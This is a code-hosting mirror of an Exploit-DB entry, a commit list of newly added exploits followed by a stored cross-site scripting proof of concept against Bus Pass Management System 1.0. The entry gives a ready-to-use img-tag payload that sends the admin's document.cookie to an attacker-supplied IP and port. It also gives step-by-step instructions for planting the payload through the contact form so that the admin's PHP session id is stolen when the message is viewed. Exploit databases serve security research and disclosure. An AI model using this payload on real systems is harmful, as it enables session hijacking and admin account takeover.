bpmcdevitt/exploit-db-mirror
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
exploit-db-mirror/exploits/php/webapps/51242.txt
Exploit-DB d46ab98863 DB: 2023-04-06 
32 changes to exploits/shellcodes/ghdb

Answerdev 1.0.3 - Account Takeover

D-Link DIR-846 - Remote Command Execution (RCE) vulnerability

Dell EMC Networking PC5500 firmware versions 4.1.0.22 and  Cisco Sx / SMB - Information Disclosure

SOUND4 LinkAndShare Transmitter 1.1.2 - Format String Stack Buffer Overflow

ERPNext 12.29 - Cross-Site Scripting (XSS)

Liferay Portal 6.2.5 - Insecure Permissions

GNU screen v4.9.0 - Privilege Escalation

Apache Tomcat 10.1 - Denial Of Service

PostgreSQL 9.6.1 - Remote Code Execution (RCE) (Authenticated)

BTCPay Server v1.7.4 - HTML Injection.

Provide Server v.14.4 XSS - CSRF & Remote Code Execution (RCE)

Secure Web Gateway 10.2.11 - Cross-Site Scripting (XSS)

ImageMagick 7.1.0-49 - DoS

bgERP v22.31 (Orlovets) - Cookie Session vulnerability & Cross-Site Scripting (XSS)

Bus Pass Management System 1.0  - Stored Cross-Site Scripting (XSS)

Calendar Event Multi View  1.4.07 - Unauthenticated Arbitrary Event Creation to Cross-Site Scripting (XSS)

CKEditor 5 35.4.0 - Cross-Site Scripting (XSS)

Control Web Panel 7 (CWP7) v0.9.8.1147 -  Remote Code Execution (RCE)

Froxlor 2.0.3 Stable - Remote Code Execution (RCE)

ImageMagick 7.1.0-49 - Arbitrary File Read

itech TrainSmart r1044 - SQL injection

Online Eyewear Shop 1.0 - SQL Injection (Unauthenticated)

PhotoShow 3.0 - Remote Code Execution

projectSend r1605 - Remote Code Exectution RCE

Responsive FileManager 9.9.5 - Remote Code Execution (RCE)

zstore 6.6.0 - Cross-Site Scripting (XSS)

Binwalk v2.3.2 - Remote Command Execution (RCE)

XWorm Trojan 2.1 - Null Pointer Derefernce DoS

Kardex Mlog MCC 5.7.12 - RCE (Remote Code Execution)

Linux/x86_64 - bash Shellcode with xor encoding
2023-04-06 00:16:31 +00:00

27 lines
No EOL
1.4 KiB
Text
Raw Blame History

# Exploit Title: Bus Pass Management System 1.0 - Stored Cross-Site Scripting (XSS)
# Date: 2021-09-17
# Exploit Author: Matteo Conti - https://deltaspike.io
# Vendor Homepage: https://phpgurukul.com/
# Software Link: https://phpgurukul.com/wp-content/uploads/2021/07/Bus-Pass-Management-System-Using-PHP-MySQL.zip
# Version: 1.0
# Tested on: Ubuntu 18.04 - LAMP
# Description
The application permits to send a message to the admin from the section "contacts". Including a XSS payload in title or message,
maybe also in email bypassing the client side controls, the payload will be executed when the admin will open the message to read it.
# Vulnerable page: /admin/view-enquiry.php?viewid=1 (change the "view id" according to the number of the message)
# Tested Payload: <img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
# Prof of concept:
- From /contact.php, send a message containing the following payload in "title" or "message" fields:
<img src=http://localhost/buspassms/images/overlay.png width=0 height=0 onload=this.src='http://<YOUR-IP>:<YOUR-PORT>/?'+document.cookie>
(the first url have to be an existing image)
- Access with admin credentials, enter to /admin/unreadenq.php and click "view" near the new message to execute the payload. After the first view, you can execute again the payload from /admin/readenq.php
- Your listener will receive the PHP session id.
Reference in a new issue View git blame Copy permalink